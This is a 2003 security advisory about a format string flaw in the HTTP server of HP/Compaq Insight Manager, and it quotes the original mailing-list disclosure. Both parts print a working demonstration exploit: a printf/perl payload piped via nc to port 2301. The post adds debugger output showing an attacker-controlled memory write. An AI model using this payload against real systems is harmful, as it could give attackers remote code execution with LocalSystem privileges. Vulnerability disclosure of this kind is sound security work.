Compaq Insight Manager Format String Flaw May Let Remote Users Execute Arbitrary Code
SecurityTracker Alert ID: 1007390
SecurityTracker URL: http://securitytracker.com/id/1007390
Date: Aug 4 2003
Impact: Execution of arbitrary code via network, Root access via network
Exploit Included: Yes
Version(s): 5.00 H
A vulnerability was reported in HP/Compaq Insight Manager. A remote user may be able to execute arbitrary code.
It is reported that there is a format string flaw in the processing of DebugSearchPaths HTTP requests: user-supplied data from the Url parameter is apparently passed to a printf-style function as the format string. According to the report, the EAX register can be overwritten with attacker-supplied bytes (the debugger output shows EAX = 0x42424242 at a `mov [eax],ecx` instruction, i.e. a memory write to an attacker-chosen address). It may be possible for a remote user to execute arbitrary code with LocalSystem privileges [but that was not confirmed in the report].
A demonstration exploit command is provided:
$ printf "GET /<\x21.DebugSearchPaths>?Url=`perl -e 'print "A"x14'`BBBB`perl -e 'print ".%%x"x1208'`%%n> HTTP/1.0\n\n" | nc 192.168.235.131 2301
A remote user may be able to execute arbitrary code with LocalSystem privileges [but that was not confirmed in the report].
No solution was available at the time of this entry.
Vendor URL: www.hp.com/
Cause: Input validation error
Underlying OS: Windows (Any)
Source Message Contents
Subject: [Full-Disclosure] format string bug in Compaq HTTP Servers
There is a format string bug in Compaq HTTP Servers.
[in <!.DebugSearchPaths>?Url=> requests]
The HTTP server runs with LocalSystem account.
All versions I have tested had this format string bug.
To be sure that it wasn't already fixed, I downloaded this new version..
Insight Management Agent
Version: 5.00 H (01/17/2003)
$ printf "GET /<\x21.DebugSearchPaths>?Url=`perl -e 'print "A"x14'`BBBB`perl -e 'print ".%%x"x1208'`%%n> HTTP/1.0\n\n" | nc 192.168.235.131 2301
(9a8.934): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=42424242 ebx=0000006e ecx=000012eb edx=00000200 esi=00b440c0 edi=00000800
eip=780127a8 esp=010287f8 ebp=01028a50 iopl=0 nv up ei pl zr na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010246
780127a8 8908 mov [eax],ecx ds:0023:42424242=????????
*** WARNING: Unable to verify checksum for C:\PROGRA~1\Compaq\COMPAQ~1\CPQWEB~1\CpqHMMO.dll
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\PROGRA~1\Compaq
Have a nice day